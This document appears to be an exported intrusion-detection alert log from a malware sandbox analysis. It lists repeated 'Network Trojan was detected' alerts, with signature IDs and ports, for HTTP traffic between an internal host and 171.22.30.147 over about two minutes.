            Timestamp:192.168.2.3171.22.30.14749795802024318 01/05/23-08:52:39.717554
            SID:2024318
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749847802021641 01/05/23-08:52:55.372015
            SID:2021641
            Source Port:49847
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749893802024318 01/05/23-08:53:07.754435
            SID:2024318
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749945802021641 01/05/23-08:53:23.275014
            SID:2021641
            Source Port:49945
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500342025483 01/05/23-08:53:50.559615
            SID:2025483
            Source Port:80
            Destination Port:50034
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749795802024313 01/05/23-08:52:39.717554
            SID:2024313
            Source Port:49795
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749876802025381 01/05/23-08:53:03.175112
            SID:2025381
            Source Port:49876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749893802024313 01/05/23-08:53:07.754435
            SID:2024313
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499532025483 01/05/23-08:53:25.551278
            SID:2025483
            Source Port:80
            Destination Port:49953
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749968802825766 01/05/23-08:53:31.490288
            SID:2825766
            Source Port:49968
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749879802825766 01/05/23-08:53:03.965987
            SID:2825766
            Source Port:49879
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749884802024313 01/05/23-08:53:05.293982
            SID:2024313
            Source Port:49884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749866802021641 01/05/23-08:53:00.520534
            SID:2021641
            Source Port:49866
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749884802024318 01/05/23-08:53:05.293982
            SID:2024318
            Source Port:49884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749839802025381 01/05/23-08:52:53.202583
            SID:2025381
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499312025483 01/05/23-08:53:19.563898
            SID:2025483
            Source Port:80
            Destination Port:49931
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749923802021641 01/05/23-08:53:17.329996
            SID:2021641
            Source Port:49923
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749895802025381 01/05/23-08:53:08.372653
            SID:2025381
            Source Port:49895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750075802021641 01/05/23-08:54:01.517358
            SID:2021641
            Source Port:50075
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750075802825766 01/05/23-08:54:01.517358
            SID:2825766
            Source Port:50075
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500782025483 01/05/23-08:54:02.394122
            SID:2025483
            Source Port:80
            Destination Port:50078
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749700802024317 01/05/23-08:52:07.351938
            SID:2024317
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500562025483 01/05/23-08:53:56.550069
            SID:2025483
            Source Port:80
            Destination Port:50056
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749700802024312 01/05/23-08:52:07.351938
            SID:2024312
            Source Port:49700
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750056802021641 01/05/23-08:53:56.463023
            SID:2021641
            Source Port:50056
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500672025483 01/05/23-08:53:59.459785
            SID:2025483
            Source Port:80
            Destination Port:50067
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749949802825766 01/05/23-08:53:24.361661
            SID:2825766
            Source Port:49949
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749824802024318 01/05/23-08:52:47.639113
            SID:2024318
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500452025483 01/05/23-08:53:53.560541
            SID:2025483
            Source Port:80
            Destination Port:50045
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749913802024318 01/05/23-08:53:14.593137
            SID:2024318
            Source Port:49913
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750033802024313 01/05/23-08:53:50.199257
            SID:2024313
            Source Port:50033
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749742802825766 01/05/23-08:52:23.189713
            SID:2825766
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749955802825766 01/05/23-08:53:25.989714
            SID:2825766
            Source Port:49955
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749962802025381 01/05/23-08:53:29.855666
            SID:2025381
            Source Port:49962
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749859802025381 01/05/23-08:52:58.622571
            SID:2025381
            Source Port:49859
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749861802024318 01/05/23-08:52:59.149010
            SID:2024318
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749728802825766 01/05/23-08:52:19.268418
            SID:2825766
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749956802024318 01/05/23-08:53:26.250117
            SID:2024318
            Source Port:49956
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750039802021641 01/05/23-08:53:51.865723
            SID:2021641
            Source Port:50039
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750056802825766 01/05/23-08:53:56.463023
            SID:2825766
            Source Port:50056
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749913802024313 01/05/23-08:53:14.593137
            SID:2024313
            Source Port:49913
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497992025483 01/05/23-08:52:40.916842
            SID:2025483
            Source Port:80
            Destination Port:49799
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749942802025381 01/05/23-08:53:22.441601
            SID:2025381
            Source Port:49942
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499452025483 01/05/23-08:53:23.362979
            SID:2025483
            Source Port:80
            Destination Port:49945
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749827802021641 01/05/23-08:52:48.461129
            SID:2021641
            Source Port:49827
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749861802024313 01/05/23-08:52:59.149010
            SID:2024313
            Source Port:49861
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749764802025381 01/05/23-08:52:29.472789
            SID:2025381
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750013802825766 01/05/23-08:53:43.455950
            SID:2825766
            Source Port:50013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498962025483 01/05/23-08:53:08.839540
            SID:2025483
            Source Port:80
            Destination Port:49896
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749923802024318 01/05/23-08:53:17.329996
            SID:2024318
            Source Port:49923
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749946802024313 01/05/23-08:53:23.547730
            SID:2024313
            Source Port:49946
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749721802025381 01/05/23-08:52:17.231128
            SID:2025381
            Source Port:49721
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749738802825766 01/05/23-08:52:22.066688
            SID:2825766
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750029802021641 01/05/23-08:53:49.112211
            SID:2021641
            Source Port:50029
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749946802024318 01/05/23-08:53:23.547730
            SID:2024318
            Source Port:49946
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749851802024313 01/05/23-08:52:56.435777
            SID:2024313
            Source Port:49851
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749837802021641 01/05/23-08:52:51.988001
            SID:2021641
            Source Port:49837
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498592025483 01/05/23-08:52:58.704392
            SID:2025483
            Source Port:80
            Destination Port:49859
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750003802025381 01/05/23-08:53:40.763519
            SID:2025381
            Source Port:50003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750006802021641 01/05/23-08:53:41.552586
            SID:2021641
            Source Port:50006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497222025483 01/05/23-08:52:17.587572
            SID:2025483
            Source Port:80
            Destination Port:49722
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749851802024318 01/05/23-08:52:56.435777
            SID:2024318
            Source Port:49851
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749916802825766 01/05/23-08:53:15.372296
            SID:2825766
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749732802021641 01/05/23-08:52:20.401546
            SID:2021641
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749979802024313 01/05/23-08:53:34.430839
            SID:2024313
            Source Port:49979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497112025483 01/05/23-08:52:12.140154
            SID:2025483
            Source Port:80
            Destination Port:49711
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498482025483 01/05/23-08:52:55.724943
            SID:2025483
            Source Port:80
            Destination Port:49848
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749992802024313 01/05/23-08:53:37.885447
            SID:2024313
            Source Port:49992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500642025483 01/05/23-08:53:58.673182
            SID:2025483
            Source Port:80
            Destination Port:50064
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500532025483 01/05/23-08:53:55.718019
            SID:2025483
            Source Port:80
            Destination Port:50053
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749956802024313 01/05/23-08:53:26.250117
            SID:2024313
            Source Port:49956
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749850802021641 01/05/23-08:52:56.172529
            SID:2021641
            Source Port:49850
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749797802825766 01/05/23-08:52:40.255110
            SID:2825766
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749774802825766 01/05/23-08:52:32.369884
            SID:2825766
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749992802024318 01/05/23-08:53:37.885447
            SID:2024318
            Source Port:49992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749936802024313 01/05/23-08:53:20.832811
            SID:2024313
            Source Port:49936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750019802021641 01/05/23-08:53:45.311637
            SID:2021641
            Source Port:50019
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749933802024318 01/05/23-08:53:20.043516
            SID:2024318
            Source Port:49933
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749758802024313 01/05/23-08:52:27.765970
            SID:2024313
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750003802825766 01/05/23-08:53:40.763519
            SID:2825766
            Source Port:50003
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750053802024318 01/05/23-08:53:55.636070
            SID:2024318
            Source Port:50053
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749893802021641 01/05/23-08:53:07.754435
            SID:2021641
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499562025483 01/05/23-08:53:26.337856
            SID:2025483
            Source Port:80
            Destination Port:49956
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749979802024318 01/05/23-08:53:34.430839
            SID:2024318
            Source Port:49979
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750053802024313 01/05/23-08:53:55.636070
            SID:2024313
            Source Port:50053
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499342025483 01/05/23-08:53:20.381423
            SID:2025483
            Source Port:80
            Destination Port:49934
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749966802024313 01/05/23-08:53:30.946864
            SID:2024313
            Source Port:49966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749969802024313 01/05/23-08:53:31.782144
            SID:2024313
            Source Port:49969
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750043802024313 01/05/23-08:53:52.949985
            SID:2024313
            Source Port:50043
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750072802025381 01/05/23-08:54:00.683642
            SID:2025381
            Source Port:50072
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749784802825766 01/05/23-08:52:36.673037
            SID:2825766
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749744802025381 01/05/23-08:52:23.736699
            SID:2025381
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749821802825766 01/05/23-08:52:46.829983
            SID:2825766
            Source Port:49821
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749952802025381 01/05/23-08:53:25.200806
            SID:2025381
            Source Port:49952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750033802825766 01/05/23-08:53:50.199257
            SID:2825766
            Source Port:50033
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749978802021641 01/05/23-08:53:34.155329
            SID:2021641
            Source Port:49978
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749705802825766 01/05/23-08:52:09.363911
            SID:2825766
            Source Port:49705
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749777802025381 01/05/23-08:52:34.550245
            SID:2025381
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749923802024313 01/05/23-08:53:17.329996
            SID:2024313
            Source Port:49923
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749860802021641 01/05/23-08:52:58.886735
            SID:2021641
            Source Port:49860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749966802024318 01/05/23-08:53:30.946864
            SID:2024318
            Source Port:49966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749708802025381 01/05/23-08:52:10.789251
            SID:2025381
            Source Port:49708
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750058802025381 01/05/23-08:53:57.002594
            SID:2025381
            Source Port:50058
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749758802024318 01/05/23-08:52:27.765970
            SID:2024318
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749926802825766 01/05/23-08:53:18.143087
            SID:2825766
            Source Port:49926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749731802025381 01/05/23-08:52:20.113614
            SID:2025381
            Source Port:49731
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750000802825766 01/05/23-08:53:39.996140
            SID:2825766
            Source Port:50000
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749860802825766 01/05/23-08:52:58.886735
            SID:2825766
            Source Port:49860
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749718802825766 01/05/23-08:52:15.464089
            SID:2825766
            Source Port:49718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750046802825766 01/05/23-08:53:53.748051
            SID:2825766
            Source Port:50046
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749849802025381 01/05/23-08:52:55.895226
            SID:2025381
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749889802825766 01/05/23-08:53:06.674333
            SID:2825766
            Source Port:49889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749936802024318 01/05/23-08:53:20.832811
            SID:2024318
            Source Port:49936
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749767802025381 01/05/23-08:52:30.299348
            SID:2025381
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500082025483 01/05/23-08:53:42.185814
            SID:2025483
            Source Port:80
            Destination Port:50008
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749775802024313 01/05/23-08:52:32.683406
            SID:2024313
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749988802825766 01/05/23-08:53:36.817903
            SID:2825766
            Source Port:49988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749982802825766 01/05/23-08:53:35.215314
            SID:2825766
            Source Port:49982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749775802024318 01/05/23-08:52:32.683406
            SID:2024318
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749893802825766 01/05/23-08:53:07.754435
            SID:2825766
            Source Port:49893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749870802021641 01/05/23-08:53:01.561418
            SID:2021641
            Source Port:49870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749903802825766 01/05/23-08:53:11.877542
            SID:2825766
            Source Port:49903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750066802024313 01/05/23-08:53:59.096230
            SID:2024313
            Source Port:50066
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750076802024318 01/05/23-08:54:01.789357
            SID:2024318
            Source Port:50076
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749742802024318 01/05/23-08:52:23.189713
            SID:2024318
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497772025483 01/05/23-08:52:34.636579
            SID:2025483
            Source Port:80
            Destination Port:49777
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749919802021641 01/05/23-08:53:16.188265
            SID:2021641
            Source Port:49919
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749742802024313 01/05/23-08:52:23.189713
            SID:2024313
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497442025483 01/05/23-08:52:23.820398
            SID:2025483
            Source Port:80
            Destination Port:49744
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749880802021641 01/05/23-08:53:04.232334
            SID:2021641
            Source Port:49880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749975802021641 01/05/23-08:53:33.363507
            SID:2021641
            Source Port:49975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749804802825766 01/05/23-08:52:42.167879
            SID:2825766
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497332025483 01/05/23-08:52:20.762776
            SID:2025483
            Source Port:80
            Destination Port:49733
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749969802024318 01/05/23-08:53:31.782144
            SID:2024318
            Source Port:49969
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750076802024313 01/05/23-08:54:01.789357
            SID:2024313
            Source Port:50076
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749998802021641 01/05/23-08:53:39.461942
            SID:2021641
            Source Port:49998
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749903802021641 01/05/23-08:53:11.877542
            SID:2021641
            Source Port:49903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749814802021641 01/05/23-08:52:44.953030
            SID:2021641
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750068802025381 01/05/23-08:53:59.646284
            SID:2025381
            Source Port:50068
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750062802025381 01/05/23-08:53:58.073723
            SID:2025381
            Source Port:50062
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750066802024318 01/05/23-08:53:59.096230
            SID:2024318
            Source Port:50066
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498372025483 01/05/23-08:52:52.073871
            SID:2025483
            Source Port:80
            Destination Port:49837
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749909802021641 01/05/23-08:53:13.489642
            SID:2021641
            Source Port:49909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749933802024313 01/05/23-08:53:20.043516
            SID:2024313
            Source Port:49933
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749841802024313 01/05/23-08:52:53.743125
            SID:2024313
            Source Port:49841
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749899802021641 01/05/23-08:53:10.169881
            SID:2021641
            Source Port:49899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499902025483 01/05/23-08:53:37.463055
            SID:2025483
            Source Port:80
            Destination Port:49990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498262025483 01/05/23-08:52:48.269953
            SID:2025483
            Source Port:80
            Destination Port:49826
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749988802021641 01/05/23-08:53:36.817903
            SID:2021641
            Source Port:49988
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500192025483 01/05/23-08:53:45.393441
            SID:2025483
            Source Port:80
            Destination Port:50019
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749841802024318 01/05/23-08:52:53.743125
            SID:2024318
            Source Port:49841
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497882025483 01/05/23-08:52:37.863351
            SID:2025483
            Source Port:80
            Destination Port:49788
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749830802025381 01/05/23-08:52:49.252221
            SID:2025381
            Source Port:49830
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498092025483 01/05/23-08:52:43.678579
            SID:2025483
            Source Port:80
            Destination Port:49809
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497662025483 01/05/23-08:52:30.097797
            SID:2025483
            Source Port:80
            Destination Port:49766
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749804802021641 01/05/23-08:52:42.167879
            SID:2021641
            Source Port:49804
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749715802021641 01/05/23-08:52:14.021138
            SID:2021641
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750078802025381 01/05/23-08:54:02.320663
            SID:2025381
            Source Port:50078
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
